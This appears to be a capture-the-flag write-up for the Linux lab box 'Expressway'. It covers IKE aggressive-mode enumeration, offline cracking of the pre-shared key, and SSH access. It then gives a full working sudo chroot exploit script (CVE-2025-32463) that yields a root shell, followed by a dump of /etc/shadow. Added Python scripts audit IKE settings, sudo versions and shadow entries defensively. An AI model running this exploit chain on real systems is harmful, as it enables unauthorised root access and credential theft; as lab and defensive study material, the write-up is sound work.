Expressway starts with enumeration of IPsec/IKE, where we obtained the pre-shared key hash that gave us access over SSH. We escalated privileges by exploiting a vulnerable version of sudo.
Name: Expressway
OS: Linux
Points: 20
Difficulty: Easy
Release date: 2025-09-20
IP: 10.10.11.87
Maker: dakkmaddy

Rated (user-rated difficulty, bar chart): Cake 651, VeryEasy 505, Easy 1072, TooEasy 353, Medium 132, BitHard 47, Hard 31, TooHard 4, ExHard 3, BrainFuck 29
Recon
nmap & rustscan
nmap shows a single open TCP port: ssh (22).

# Nmap 7.95 scan initiated Sat Sep 20 15:51:20 2025 as: /usr/lib/nmap/nmap --privileged -p22 -sV -sC -oN nmap_scan 10.10.11.87
Nmap scan report for 10.10.11.87
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 20 15:51:30 2025 -- 1 IP address (1 host up) scanned in 10.50 seconds

rustscan shows that UDP port 500 is open (the follow-up nmap it launches probes TCP 500, which is closed).

❯ ./rustscan -r 1-65535 --udp -a 10.10.11.87 -u 10000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.11.87:500
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 16:55 CST
Initiating Ping Scan at 16:55
Scanning 10.10.11.87 [4 ports]
Completed Ping Scan at 16:55, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 10.10.11.87 [1 port]
Completed SYN Stealth Scan at 16:55, 0.11s elapsed (1 total ports)
Nmap scan report for 10.10.11.87
Host is up, received reset ttl 63 (0.088s latency).
Scanned at 2025-09-20 16:55:43 CST for 0s
PORT STATE SERVICE REASON
500/tcp closed isakmp reset ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (80B)
❯

IPsec/IKE
UDP port 500 is where the IPsec/IKE protocol suite negotiates secure connections. We run ike-scan, which shows 3DES encryption, SHA1 hash, DH group modp1024 and PSK (pre-shared key) authentication. IKEv2 is also probed but is not 'accepted' (NO_PROPOSAL_CHOSEN).

❯ ike-scan -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=d627b26401e24585)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.096 seconds (10.41 hosts/sec). 1 returned handshake; 0 returned notify
❯ ike-scan -M 10.10.11.87 --ikev2
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Notify message 14 (NO_PROPOSAL_CHOSEN)
HDR=(CKY-R=ba006e2e43afb30f, IKEv2)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.093 seconds (10.74 hosts/sec). 0 returned handshake; 1 returned notify
❯

Aggressive mode is allowed (-A), which would let us obtain the pre-shared key.

❯ sudo ike-scan -A -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=a53afe4a993fef37)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.095 seconds (10.54 hosts/sec). 1 returned handshake; 0 returned notify
❯
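The two handshakes above show what ike-scan reveals to anyone who can reach UDP 500: the accepted proposal (3DES, SHA1, modp1024, PSK) and, in Aggressive Mode, the responder's identity plus a Hash payload that depends on the PSK. The following Python script is an added example, not part of the original writeup or of ike-scan itself: it parses ike-scan -M output into one record per handshake and reports the weak settings a defender would want to fix. The sample output (tab-indented as ike-scan -M prints it, modelled on the handshakes above), the weak-parameter lists and all function names are constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of ike-scan -M output, modelled on the three probes in this
# writeup (Main Mode, Aggressive Mode, IKEv2). Not captured live.
SAMPLE_OUTPUT = """\
10.10.11.87\tMain Mode Handshake returned
\tHDR=(CKY-R=d627b26401e24585)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tVID=09002689dfd6b712 (XAUTH)
10.10.11.87\tAggressive Mode Handshake returned
\tHDR=(CKY-R=a53afe4a993fef37)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
\tHash(20 bytes)
10.10.11.87\tNotify message 14 (NO_PROPOSAL_CHOSEN)
\tHDR=(CKY-R=ba006e2e43afb30f, IKEv2)
"""

# IKEv1 phase-1 parameters this example treats as weak (the policy is ours, not ike-scan's).
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_DH_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536


@dataclass
class Handshake:
    host: str
    mode: str                                  # "main", "aggressive" or "notify"
    sa: dict = field(default_factory=dict)     # key/value pairs of the SA payload
    peer_id: str = ""                          # responder ID (Aggressive Mode only)
    hash_returned: bool = False                # a Hash payload was sent in the clear


def parse_ike_scan(text):
    """Group ike-scan -M output into one Handshake per probe."""
    handshakes = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Starting ike-scan", "Ending ike-scan")):
            continue
        if not line.startswith("\t"):
            # A non-indented line opens a new probe result: "<host>\t<summary>".
            host, _, rest = line.partition("\t")
            if rest.startswith("Main Mode"):
                mode = "main"
            elif rest.startswith("Aggressive Mode"):
                mode = "aggressive"
            else:
                mode = "notify"
            handshakes.append(Handshake(host=host, mode=mode))
            continue
        if not handshakes:
            continue
        current = handshakes[-1]
        body = line.strip()
        if body.startswith("SA=("):
            current.sa = dict(re.findall(r"(\w+)=([^\s)]+)", body[4:]))
        elif body.startswith("ID("):
            m = re.search(r"Value=([^)]+)\)", body)
            if m:
                current.peer_id = m.group(1)
        elif body.startswith("Hash("):
            current.hash_returned = True
    return handshakes


def assess(handshakes):
    """Return one finding per weak setting observed (duplicates across probes collapsed)."""
    findings = []

    def add(msg):
        if msg not in findings:
            findings.append(msg)

    for hs in handshakes:
        if hs.mode == "notify":
            continue
        enc = hs.sa.get("Enc", "")
        hsh = hs.sa.get("Hash", "")
        group = hs.sa.get("Group", "")
        auth = hs.sa.get("Auth", "")
        if auth == "PSK":
            add(f"{hs.host}: PSK authentication accepted")
        if hs.mode == "aggressive" and auth == "PSK" and hs.hash_returned:
            add(f"{hs.host}: Aggressive Mode with PSK returns a hash that can be attacked offline")
        if enc in WEAK_ENC:
            add(f"{hs.host}: weak encryption {enc}")
        if hsh in WEAK_HASH:
            add(f"{hs.host}: weak hash {hsh}")
        if group.split(":")[0] in WEAK_DH_GROUPS:
            add(f"{hs.host}: weak DH group {group}")
        if hs.peer_id:
            add(f"{hs.host}: responder identity {hs.peer_id} disclosed in clear")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_ike_scan(SAMPLE_OUTPUT)):
        print(finding)
```

The fix on the responder side is the mirror image of the findings: disable Aggressive Mode (or IKEv1 altogether in favour of IKEv2), move from PSK to certificate-based authentication or at least a long random PSK, and restrict the proposal to AES, SHA-2 and DH group 14 or stronger.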

Cracking The Hash
With ike-scan in aggressive mode we specify the file in which to save the hash (-Phash).

❯ sudo ike-scan -M -A -Phash 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=9d1d2ce903a459fd)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.101 seconds (9.89 hosts/sec). 1 returned handshake; 0 returned notify
❯ cat hash
684b5036eca84e202c66e0b53e0994fce79129c9db92ec8747a7aef9905d697316f4c9845842b8e050dd0ac42aeb7c7df0e48c76690252656814f145270479e7bf29da0ffe7fe6fe5316dda810aa242f77f079341e8f2b00760439e46bbed4138131c8998f51f4a9a25710d0288e182da483ffa0a32f74ded8bf03638894c2d4:66494dec0cdc6717490975a566cb4118ef538cb77ea483c27f13b2ab211c6edbad69c5a384f78f49d71d37d3984a3800da96defa36cc5ba0e65e3aa4d4d76aa521a85881bbd073e341fb11c1526af8c387c1e7feb735330e8a523bcfb559baa728ed966df1da117c2ad23b28e28cba21d046b17de8b35cde23730b9153b75c3a:9d1d2ce903a459fd:754adfbe1afa5d70:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:1ade14bf7a94ba776c1e4cd5f76cfa24043b606a:39c8912310594124f8fe0fca2a8759abce239956a7ccfa45200f2f00f9f809ea:e5a58bfc2a44549de5ad339186332a7c35d06b41
❯

With psk-crack we specify the hash file and the wordlist. It returned the value of the pre-shared key.

❯ sudo psk-crack hash -d /usr/share/wordlists/rockyou.txt -v
[sudo] password for sckull:
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Loaded 1 PSK entries from hash
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 09ba9f5a7d9c6de00d659f0fb516c1acfea9fbcb
Ending psk-crack: 8045040 iterations in 4.414 seconds (1822536.77 iterations/sec)
❯

User - Ike
We log in over SSH as the user ike with the password obtained above, and read the user.txt flag.

❯ ssh ike@10.10.11.87
ike@10.10.11.87's password:
Last login: Wed Sep 17 10:26:26 BST 2025 from 10.10.14.77 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 22:48:44 2025 from 10.10.14.8
ike@expressway:~$ whoami;id;pwd
ike
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
/home/ike
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
3d98e02d13edd20530c2aa2cf7f32dbb
ike@expressway:~$

Locally, we find port 25 listening on the loopback address only.

ike@expressway:/dev/shm$ netstat -ntpl
(No info could be read for "-p": geteuid()=1001 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
ike@expressway:/dev/shm$

Connecting to this port shows Exim 4.98.2. The closest vulnerable version is 4.98 (CVE-2025-26794).

ike@expressway:/dev/shm$ nc 127.0.0.1 25
123
220 expressway.htb ESMTP Exim 4.98.2 Sun, 21 Sep 2025 22:55:50 +0100
500 unrecognized command
^C
ike@expressway:/dev/shm$

Sudo
We enumerate the files with the SUID bit set. Two sudo executables are listed: /usr/bin/sudo and /usr/local/bin/sudo.

ike@expressway:~$ find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 70K Aug 26 22:05 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Aug 26 22:05 /usr/bin/chsh
-rwsr-xr-x 1 root root 87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 75K Sep 9 10:09 /usr/bin/mount
-rwsr-xr-x 1 root root 19K Sep 9 10:09 /usr/bin/newgrp
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd
-rwsr-xr-x 1 root root 91K Sep 9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27 2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 63K Sep 9 10:09 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51K Mar 8 2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 483K Aug 10 00:07 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14K Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 15K Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4
ike@expressway:~$

Versions 1.9.17 and 1.9.13p3 are shown. The one actually in use is the first: which sudo resolves to /usr/local/bin/sudo.

ike@expressway:/dev/shm$ /usr/local/bin/sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:/dev/shm$ /usr/bin/sudo --version
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3
ike@expressway:/dev/shm$ which sudo
/usr/local/bin/sudo
ike@expressway:/dev/shm$
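Two sudo binaries with different versions, where the newer, locally built one comes first on PATH, is exactly the situation a version check on a host should catch. The following Python script is an added example and not the writeup's or the sudo project's code: it parses sudo --version output into a comparable tuple (handling the pN patch-level suffix), tests it against the affected range published for CVE-2025-32463 (1.9.14 up to and including 1.9.17, fixed in 1.9.17p1) and shows which binary a bare sudo resolves to for a given PATH order. The sample version strings, the PATH list and all function names are constructed for this example.

```python
import re

# Constructed sample: `<path> --version` output for each sudo binary found on the
# host, modelled on the two binaries listed above (not captured live).
SAMPLE_VERSIONS = {
    "/usr/local/bin/sudo": "Sudo version 1.9.17\nSudoers policy plugin version 1.9.17\n",
    "/usr/bin/sudo": "Sudo version 1.9.13p3\nSudoers policy plugin version 1.9.13p3\n",
}
# Constructed PATH order; the first directory holding a sudo wins, as `which sudo` does.
SAMPLE_PATH = ["/usr/local/bin", "/usr/bin", "/bin"]

# Affected range published for CVE-2025-32463: 1.9.14 through 1.9.17 inclusive,
# fixed in 1.9.17p1. Versions are compared as (major, minor, micro, patchlevel).
AFFECTED_FROM = (1, 9, 14, 0)
FIXED_IN = (1, 9, 17, 1)

VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.MULTILINE)


def parse_sudo_version(text):
    """Turn 'Sudo version 1.9.13p3' into (1, 9, 13, 3); a missing pN means patchlevel 0."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError("no 'Sudo version' line in output")
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def format_version(version):
    major, minor, micro, patch = version
    return f"{major}.{minor}.{micro}" + (f"p{patch}" if patch else "")


def is_affected(version):
    """True when the version lies inside [AFFECTED_FROM, FIXED_IN)."""
    return AFFECTED_FROM <= version < FIXED_IN


def resolve_on_path(binary_paths, path_dirs):
    """Which of the known binaries a bare `sudo` resolves to for this PATH order."""
    for directory in path_dirs:
        candidate = f"{directory}/sudo"
        if candidate in binary_paths:
            return candidate
    return None


def audit(versions_by_path, path_dirs):
    """Return {path: (version_tuple, affected)} and the path a bare `sudo` would run."""
    report = {}
    for path, text in versions_by_path.items():
        version = parse_sudo_version(text)
        report[path] = (version, is_affected(version))
    return report, resolve_on_path(versions_by_path, path_dirs)


if __name__ == "__main__":
    report, active = audit(SAMPLE_VERSIONS, SAMPLE_PATH)
    for path, (version, affected) in report.items():
        flag = "AFFECTED" if affected else "not in affected range"
        mark = " (first on PATH)" if path == active else ""
        print(f"{path}: {format_version(version)} -> {flag}{mark}")
```

A version test is a first pass, not proof: a distribution package can carry a backported fix under an older version string, whereas a locally built binary such as /usr/local/bin/sudo here has no such backport and its version string is what it is. Either way, the durable fix is to remove the extra build or update it past 1.9.17p1, and to watch for SUID binaries that appear outside the package manager's control.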

CVE-2025-32463
That version falls within the range affected by CVE-2025-32463. The PoC creates a configuration file and a shared library; when sudo is run with --chroot (-R) it executes that code, allowing privilege escalation.

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

After running the PoC on the machine we obtain root access and read root.txt.

ike@expressway:/dev/shm$ nano CVE-2025-32463.sh
ike@expressway:/dev/shm$ chmod +x CVE-2025-32463.sh
ike@expressway:/dev/shm$ ./CVE-2025-32463.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# cd
root@expressway:~# ls
user.txt
root@expressway:~# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
0955ccefbe1143ffe0d2afef91e1eaaf
root@expressway:/root#

Dump Hashes
We read the /etc/shadow file.

root@expressway:/root# cat /etc/shadow
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
daemon:*:20076:0:99999:7:::
bin:*:20076:0:99999:7:::
sys:*:20076:0:99999:7:::
sync:*:20076:0:99999:7:::
games:*:20076:0:99999:7:::
man:*:20076:0:99999:7:::
lp:*:20076:0:99999:7:::
mail:*:20076:0:99999:7:::
news:*:20076:0:99999:7:::
uucp:*:20076:0:99999:7:::
proxy:*:20076:0:99999:7:::
www-data:*:20076:0:99999:7:::
backup:*:20076:0:99999:7:::
list:*:20076:0:99999:7:::
irc:*:20076:0:99999:7:::
_apt:*:20076:0:99999:7:::
nobody:*:20076:0:99999:7:::
systemd-network:!*:20076::::::
systemd-timesync:!*:20077::::::
messagebus:!:20077::::::
sshd:!:20077::::::
strongswan:!:20162::::::
tcpdump:!:20171::::::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::
mysql:!:20269::::::
tftp:!:20314::::::
Debian-exim:!:20329::::::
_laurel:!:20329::::::
root@expressway:/root#
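The shadow listing above is mostly locked service accounts (including strongswan, tcpdump and Debian-exim); only root and ike carry a real hash, both in yescrypt ($y$). The following Python script is an added example, not from the writeup: it parses /etc/shadow lines and classifies each account as locked, hashed (with the hash algorithm identified) or passwordless, so that weak or legacy entries stand out in an audit. The sample shadow lines are constructed placeholders (not the box's hashes), and all names are assumptions of this example.

```python
from dataclasses import dataclass

# Constructed /etc/shadow sample. Hashes, salts and day counts are placeholders;
# 'legacy' and 'kiosk' are invented to show a weak hash and an empty password field.
SAMPLE_SHADOW = """\
root:$y$j9T$SALTSALTSALTSALTSALTSA$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHAS:20229:0:99999:7:::
daemon:*:20076:0:99999:7:::
systemd-network:!*:20076::::::
sshd:!:20077::::::
strongswan:!:20162::::::
ike:$y$j9T$SALTSALTSALTSALTSALTSA$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHAS:20292:0:99999:7:::
legacy:$1$abcdefgh$HASHHASHHASHHASHHASHHA:15000:0:99999:7:::
kiosk::20000:0:99999:7:::
"""

# crypt(3) prefix identifiers as used in the second field of /etc/shadow.
HASH_ALGORITHMS = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt",
    "y": "yescrypt", "gy": "gost-yescrypt",
}
# Algorithms this example flags as weak (policy of the example).
WEAK_ALGORITHMS = {"descrypt", "md5crypt", "unknown"}


@dataclass
class ShadowEntry:
    name: str
    status: str      # "empty", "locked" or "hashed"
    algorithm: str   # algorithm name for hashed entries, "" otherwise


def classify(password_field):
    """Classify the password field of one shadow line."""
    if password_field == "":
        return "empty", ""               # no password required at all
    if password_field[0] in "!*":
        return "locked", ""              # '!' locked by passwd -l, '*' never set
    if password_field.startswith("$"):
        parts = password_field.split("$")  # ['', id, params/salt, ..., hash]
        return "hashed", HASH_ALGORITHMS.get(parts[1], "unknown")
    # No '$' prefix: traditional 13-character DES crypt, or something unexpected.
    return "hashed", "descrypt" if len(password_field) == 13 else "unknown"


def parse_shadow(text):
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        status, algorithm = classify(fields[1])
        entries.append(ShadowEntry(fields[0], status, algorithm))
    return entries


def audit_shadow(text):
    """Summarise which accounts can authenticate with a password and how strongly it is stored."""
    entries = parse_shadow(text)
    return {
        "locked": [e.name for e in entries if e.status == "locked"],
        "empty_password": [e.name for e in entries if e.status == "empty"],
        "password_enabled": [e.name for e in entries if e.status == "hashed"],
        "weak_hash": [e.name for e in entries
                      if e.status == "hashed" and e.algorithm in WEAK_ALGORITHMS],
    }


if __name__ == "__main__":
    for key, names in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

On a host like this one the useful output is the short list under password_enabled: every name there is an account that a leaked or guessable password (the PSK reuse that opened ike's SSH login is the case in point) turns into a shell, so those are the accounts to give key-only SSH or a distinct, strong password.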